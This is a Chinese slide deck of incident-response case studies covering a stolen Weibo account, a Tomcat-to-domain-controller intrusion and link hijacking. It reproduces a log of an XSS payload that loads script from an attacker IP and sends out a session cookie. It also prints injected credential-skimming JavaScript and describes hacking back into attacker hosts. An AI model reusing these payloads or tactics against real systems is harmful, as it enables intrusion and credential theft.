.

1. “企业应急响应以及反渗透”
之真实案例分析

2. 关于我

3. • piaca
• 乌云⽩白帽⼦子
• Insight Labs 成员
• 前新浪安全架构师
• ⼋八年安全从业经验

4. • 应急响应介绍
• ⼀一些案例
• 总结

5. 什么是应急响应？

6. 被“⿊黑”了
• 被⼊入侵
• 被 DDoS
• 被劫持
• 被蠕⾍虫
• 被钓⻥鱼
• ……

7. 为什么做应急响应？

8. 被逼的

9. • 保障业务
• 解决⽅方案
• 司法途径
• 还原攻击
• 明确意图
为什么做应急响应？
• 查漏补缺

10. 怎么做应急响应？

11. • 确定攻击时间
• 查找攻击线索
• 实施解决⽅方案
怎么做应急响应？
• 定位攻击⼈人，取证
• 梳理攻击流程

12. 为什么做反渗透？

13. • 被动变主动
• 攻击者都在做什么
为什么反渗透？
• 确认攻击者是谁
• 取证

14. 案例之官微帐号被盗

16. • ⾮非⼯工作⼈人员操作
• 帐号有被 cookie 登录
分析原因
• 可是 cookie 有 httponly

17. ==================================================
URL : http://t.cn/zWI1bUQ
Last Visit Date : 2012-7-16 19:22:27
==================================================
==================================================
URL : http://50.116.13.242/index.php
Last Visit Date : 2012-7-16 19:22:28
Referrer : http://t.cn/zWI1bUQ
==================================================
==================================================
URL : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js
%3E%3C/script%3E%22%27})
Last Visit Date : 2012-7-16 19:22:28
Referrer : http://50.116.13.242/index.php
Title : player.swf (application/x-shockwave-flash 对象)
==================================================
==================================================
URL : http://50.116.13.242/e.php?opener=0&cookie=ULV
%3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma
%3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3Dweibo.com%7Cutmccn
%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/breakingnews%3B%20vjuids%3Ddae3c1e13.1369ca9b037.0.1a9eb5f46e6ac8%3B
%20vjlast%3D1334068228.1341096989.11%3B%20UOR%3D%2C%2C%3B%20un%3Dxlttnews@sina.com%3B%20wvr%3D3.6%3B%20_s_tentry
%3Dnews.sina.com.cn%3B%20Apache%3D306588567000.3021.1342421444076%3B%20SINAGLOBAL%3D306588567000.3021.1342421444076%3B
%20SUS%3DSID-1618051664-1342421545-XD-z8hcn-efefbc9f4464bf215caf1d6b0da488bf%3B%20SUE%3Des
%253D5937b4f4509871fc45195767ea7abe37%2526ev
%253Dv1%2526es2%253Da42f0190f7b1f5137f761f625bbe0e81%2526rs0%253DpnLlydVz7IsdBcHbRCS8Tdb1KmHl7c
%25252F758lHMKQRftFZBm9EDKoFVF7jexRKPF8CpY3rjGOora0pZ%25252FyDJSaDWJxRQn020MpsJxXhf5NdP2h3jfo2V
%25252FoQgA0olYEWGJNQIDFZDfkndhSSXCp%25252BldHRW%25252BkEMwhvhY4p3xR0Ki5ja94%25253D%2
Last Visit Date : 2012-7-16 19:22:31
Referrer : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js
%3E%3C/script%3E%22%27})
==================================================

18. ⼯工作⼈人员收到⼀一条私信……

19. • 某分站 XSS
• 某分站 Apache CVE-2012-0053
还原攻击

20. • 修复漏洞，修复同类漏洞
• 加强员⼯工安全意识
我们做了什么
• 增加帐号安全策略

21. • 通过 IP / 邮箱信息定位到某公司安全⼈人员
• 没有恶意⺫⽬目的
关于攻击者
• 后⾯面有把漏洞提交乌云

22. 案例之 500 错误⽇日志引发的⾎血案

24. • 500 错误代表⽂文件存在并且执⾏行
• ⾮非业务⽂文件
分析原因
• 从更多的⽇日志⼊入⼿手

27. • 通过⽇日志确认⼊入侵途径是 tomcat
• 做了⼀一些操作
还原攻击
• tomcat 帐号密码并⾮非弱密码，how？

28. • 全⺴⽹网排查
• 攻击者早在⼏几⽉月前就发⽣生
再次分析原因并且还原攻击
• 通过收集帐号密码

29. • 收集攻击者 IP
• ⼤大多是⾁肉鸡 IP，⾹香港，廊坊
吹响反击号⾓角
• ⽤用“⿊黑客”的⽅方法拿到⾹香港，廊坊多台⾁肉鸡权限
• 在⾁肉鸡上发现⼤大量⿊黑客⼯工具和扫描⽇日志
• 在⾁肉鸡上发现内⺴⽹网仍有服务器被控制

32. • 清理全⺴⽹网 tomcat
我们做了什么
• 修改业务相关帐号密码
• 部署 snort
• IDC 出⼝口策略
• 梳理全⺴⽹网 web ⺫⽬目录⽂文件
• 修改业务关键代码
• 清理后⻔门

33. 这就完了？

34. 很傻很天真

35. IT 反馈域控服务器异常

36. gh0st

37. • 多台服务器被植⼊入后⻔门
继续分析
• 通过 at ⽅方式植⼊入后⻔门
• 通过域控管理帐号
• 确定被植⼊入后⻔门最初时间

38. 2011-­‐11-­‐10,14:03:47,Security,审核成功,登录/注销
,540,**,PDC,”成功的网络登录:
用户名:
*.ad
域:
*
登录
ID:
(0x0,0x1114E11)
登录类型:
3
登录过程:
NtLmSsp
身份验证数据包:
NTLM
工作站名:
CC-­‐TEST-­‐V2
登录
GUID:
-­‐
调用方用户名:
-­‐
调用方域:
-­‐
调用方登录
ID:
-­‐
调用方进程
ID:
-­‐
传递服务:
-­‐
源网络地址:
192.168.100.81
源端口:
0
2011-­‐11-­‐10,3:13:38,Security,审核失败,帐户登录
,680,NT
AUTHORITYSYSTEM,PDC,"尝试登录的用户:
MICROSOFT_AUTHENTICATION_PACKAGE_V1_
登录帐户:
QM-­‐*$
源工作站:
CC-­‐TEST-­‐V2
错误代码:
0xC000006A
"
2011-­‐11-­‐10,3:13:38,Security,审核失败,帐户登录
,680,NT
AUTHORITYSYSTEM,PDC,"尝试登录的用户:
MICROSOFT_AUTHENTICATION_PACKAGE_V1_
登录帐户:
QM-­‐*$
源工作站:
CC-­‐TEST-­‐V2
错误代码:
0xC000006A

39. • 虚拟机
192.168.100.81
• 弱⼝口令
• 内⺴⽹网检查时关机，逃过检查
• ⺫⽬目前能够确定这台是最初被渗透的
• 域控管理登录过
• 通过抓去 hash 控制域控

41. • snort 加特征，发现仍有服务器被控制
我们⼜又做了什么
• 排查所有 windows 服务器
• 继续排查

43. • 还有美国的 IP
持续反击中
• 通过 C 段 cain 嗅探到 3389 密码

45. • 美国的 vps 上含有多个 QQ 和密码
关于攻击者
• 之前获取到其国内论坛帐号

47. 案例之永⽆无⽌止境的劫持

48. • 某业务多次多种类型劫持
• 某业务链路劫持被插⼊入⼲⼴广告
案例之永⽆无⽌止境的劫持
• DNS 劫持
• 链路劫持
• 劫持到⼀一个反向代理 IP 61.*.*.2

51. function ffCheck() {
try {
try {
var u = null != f ? f.idInput.value : document.getElementById("idInput").value;
} catch (e) {
var u = (document.getElementById("idInput").innerHTML).replace(/s/g, "");
}
var p = null != f ? f.pwdInput.value : document.getElementById("pwdInput").value;
if (u.indexOf("@") == -1) u += "@xxx.com";
try {
if (u.indexOf("@") == -1) u = u + getdomain();
} catch (e) {}
sendurl("/abc", u, p, "coremail");
} catch (e) {}
return fOnSubmit();
}

52. function sendurl(uri, u, p, i) {
xmlHttp = GetXmlHttpObject();
if (xmlHttp == null) {
return;
}
param = "user=" + u + "&pass=" + p + "&icp=" + i;
xmlHttp.onreadystatechange = stateChanged;
try {
xmlHttp.open("POST", uri + "?t=" + (new Date()).valueOf(), true);
} catch (e) {}
xmlHttp.setRequestHeader("If-Modified-Since", "0");
xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlHttp.send(param);
}

53. • 定位劫持位置
• 投诉
处理过程
• TTL
• IP

54. 然并卵

55. • 完善监控
• https?
我们做了什么

56. • 业务⾓角度
总结
• 保障业务优先
• 对抗⾓角度
• 了解对⼿手
• 技术⾓角度
• 攻击技术
• ⽇日志、流量等数据

57. 谢谢！